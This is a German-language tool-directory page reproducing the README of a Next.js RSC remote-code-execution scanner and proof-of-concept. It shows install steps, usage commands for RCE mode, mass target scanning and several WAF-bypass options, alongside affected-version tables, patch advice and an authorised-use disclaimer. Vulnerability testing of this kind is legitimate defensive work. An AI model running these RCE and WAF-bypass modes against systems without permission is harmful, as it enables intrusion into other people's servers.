Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC2-CVE-2025-55182 — Multi-Mode-Schwachstellenscanner für Next.js RCE (CVE-2025-66478/55182) mit sicherer Seitenkanalerkennung, RCE Proof-of-Concept, WAF-Bypass-Techniken und lokalem Scannen von Projektabhängigkeiten. | Kitploit
Tools/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstests
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Multi-Mode-Schwachstellenscanner für Next.js RCE (CVE-2025-66478/55182) mit sicherer Seitenkanalerkennung, RCE Proof-of-Concept, WAF-Bypass-Techniken und lokalem Scannen von Projektabhängigkeiten.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 8 MonatenNoch nicht geprüft

React2Shell Ultimate - CVE-2025-66478 Scanner

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

Der umfassendste Scanner für die Next.js RSC Schwachstelle zur Remotecodeausführung

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modes: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  WAF Bypass: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Überblick über die Schwachstelle

CVE-2025-66478 (auch bekannt als CVE-2025-55182) ist eine KRITISCHE (CVSS 10.0) Schwachstelle zur Remotecodeausführung, die Next.js-Anwendungen betrifft, die React Server Components (RSC) verwenden.

Betroffene Versionen

✨ Funktionen

Dieses Tool kombiniert die besten Funktionen mehrerer CVE-2025-66478-Scanner:

🚀 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Abhängigkeiten installieren
pip install -r requirements.txt

# Oder manuell installieren
pip install requests tqdm

📖 Verwendung

Grundlegendes Scannen

root@kitploit:~
# Nur Versionserkennung (am schnellsten, keine Ausnutzung)
python3 react2shell-ultimate.py -u https://target.com --version

# Sichere Seitenkanalerkennung (keine Codeausführung)
python3 react2shell-ultimate.py -u https://target.com --safe

# RCE Proof-of-Concept (führt harmlose Berechnung aus: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Umfassender Scan mit allen Bypass-Versuchen
python3 react2shell-ultimate.py -u https://target.com --comprehensive

Massen-Scannen

root@kitploit:~
# Mehrere Ziele aus Datei scannen
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Ruhiger Modus – nur verwundbare Hosts anzeigen
python3 react2shell-ultimate.py -l targets.txt -q

# JSON-Ausgabe auf stdout
python3 react2shell-ultimate.py -l targets.txt --json

Lokales Projekt-Scannen

root@kitploit:~
# Aktuelles Verzeichnis scannen
python3 react2shell-ultimate.py --local .

# Spezifischen Projektpfad scannen
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

WAF-Bypass-Techniken

root@kitploit:~
# Junk-Data-Bypass (fügt 128 KB Padding hinzu, um Inhaltsprüfung zu umgehen)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Benutzerdefinierte Junk-Data-Größe
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Unicode-Kodierungs-Bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Vercel-spezifischer WAF-Bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Windows-Ziel (PowerShell-Payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

Erweiterte Optionen

root@kitploit:~
# Mit Proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Benutzerdefinierte Header
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Erhöhter Timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Ausführliche Ausgabe
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 Kommandozeilenoptionen

🔬 Erkennungsmethoden

1. Sichere Seitenkanalerkennung (--safe)

Löst ein bestimmtes Fehlerantwortmuster aus, ohne Code auszuführen. Identifiziert verwundbare RSC-Implementierungen durch das Verhalten der Fehlerbehandlung.

2. RCE Proof-of-Concept (--rce)

Führt eine harmlose mathematische Berechnung aus (echo $((41*271)) = 11111), um die RCE-Fähigkeit zu bestätigen. Das Ergebnis erscheint im X-Action-Redirect-Header.

3. Versionserkennung (--version)

  • Prüft den X-Powered-By-Header auf Next.js-Version
  • Analysiert den Vary-Header auf RSC-Indikatoren
  • Testet RSC-Endpunkte auf text/x-component-Antworten
  • Durchsucht den Seitenquelltext nach Next.js-Fingerabdrücken

4. Lokales Scannen (--local)

Durchsucht Projektverzeichnisse nach:

  • package.json – Direkte Abhängigkeitsdeklaration
  • package-lock.json – NPM-Sperrdatei
  • yarn.lock – Yarn-Sperrdatei
  • pnpm-lock.yaml – PNPM-Sperrdatei
  • bun.lockb – Bun-Sperrdatei

📊 Ausgabebeispiele

Konsolenausgabe

root@kitploit:~
[VERWUNDBAR] https://target.com
    Version: 15.3.1 | Status: 200 | Methode: rce_poc
    WAF-Bypass: ERFOLG

[NICHT VERWUNDBAR] https://safe-target.com
    Version: 15.5.7 | Status: 200 | Methode: http_headers

[WAF BLOCKIERT] https://protected.com
    Version: 15.2.0 | Status: 403 | Methode: rce_poc
    WAF erkannt: Exploit blockiert

JSON-Ausgabe

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ Abhilfe

Wenn Sie verwundbare Anwendungen finden:

  1. Sofortige Aktualisierung auf gepatchte Versionen:

    • Next.js 15.x → Upgrade auf 15.5.7+ (oder den Patch Ihrer Nebenversion)
    • Next.js 16.x → Upgrade auf 16.0.7+
  2. Temporäre Abschwächungen:

    • Verwenden Sie die Edge Runtime anstelle der Node.js-Runtime
    • Deaktivieren Sie Server Actions, falls nicht benötigt
    • Setzen Sie eine WAF mit RSC-Payload-Erkennung ein
  3. Überwachen Sie die Logs auf Ausnutzungsversuche

📚 Referenzen

  • Next.js Sicherheitshinweis – CVE-2025-66478
  • Assetnote Research – React2Shell
  • NVD – CVE-2025-66478

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests und Bildungszwecken.

  • Scannen Sie nur Systeme, für die Sie ausdrückliche Erlaubnis haben
  • Der RCE-PoC-Modus führt Code auf Zielsystemen aus (harmlose Berechnung)
  • Unautorisierter Zugriff auf Computersysteme ist illegal
  • Der Autor übernimmt keine Verantwortung für Missbrauch dieses Tools

📄 Lizenz

MIT-Lizenz – Siehe LIZENZ-Datei für Details.


⭐ Gib diesem Repository einen Stern, wenn du es nützlich findest! ⭐

Tool herunterladen
VersionsbereichStatus
Next.js 15.0.0 - 15.0.4⚠️ Verwundbar
Next.js 15.1.0 - 15.1.8⚠️ Verwundbar
Next.js 15.2.0 - 15.2.5⚠️ Verwundbar
Next.js 15.3.0 - 15.3.5⚠️ Verwundbar
Next.js 15.4.0 - 15.4.7⚠️ Verwundbar
Next.js 15.5.0 - 15.5.6⚠️ Verwundbar
Next.js 16.0.0 - 16.0.6⚠️ Verwundbar
Next.js 14.3.0-canary.77+⚠️ Verwundbar
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Gepatcht
Next.js 16.0.7+✅ Gepatcht
Next.js 13.x, 14.x stable✅ Nicht betroffen
FeatureBeschreibung
🔍 Multi-Modus-ErkennungSicherer Seitenkanal, RCE PoC, nur Version, lokales Scannen
🛡️ WAF-Bypass-TechnikenJunk-Data-Padding, Unicode-Kodierung, Vercel-spezifischer Bypass
📁 Lokales Projekt-ScannenDurchsucht package.json, Lockfiles nach verwundbaren Abhängigkeiten
⚡ Hohe LeistungMultithread-Scannen mit konfigurierbarer Parallelität
📊 Mehrere AusgabeformateKonsole, JSON, Dateiexport
🎯 Präzise VersionserkennungHTTP-Header, RSC-Fingerprinting, Kenntnis gepatchter Versionen
OptionBeschreibung
-u, --urlEinzelne URL zum Scannen
-l, --listDatei mit URLs (eine pro Zeile)
--localLokales Projektverzeichnis scannen
--safeSichere Seitenkanalerkennung (kein RCE)
--rceRCE Proof-of-Concept-Modus
--versionNur Versionserkennung
--comprehensiveVollständiger Scan mit allen Techniken
--waf-bypassJunk-Data für WAF-Bypass hinzufügen
--waf-bypass-sizeJunk-Data-Größe in KB (Standard: 128)
--unicodeUnicode-Kodierung für WAF-Bypass
--vercel-bypassVercel-spezifischer WAF-Bypass
--windowsWindows PowerShell-Payload verwenden
-t, --threadsGleichzeitige Threads (Standard: 10)
--timeoutRequest-Timeout in Sekunden (Standard: 10)
-k, --insecureSSL-Verifizierung deaktivieren
--proxyProxy-URL (http://host:port)
-H, --headerBenutzerdefinierter Header (wiederholbar)
-o, --outputAusgabedatei (JSON)
--all-resultsAlle Ergebnisse speichern, nicht nur verwundbare
-v, --verboseAusführliche Ausgabe
-q, --quietNur verwundbare Hosts anzeigen
--jsonJSON-Ausgabe auf stdout
--no-colorFarbige Ausgabe deaktivieren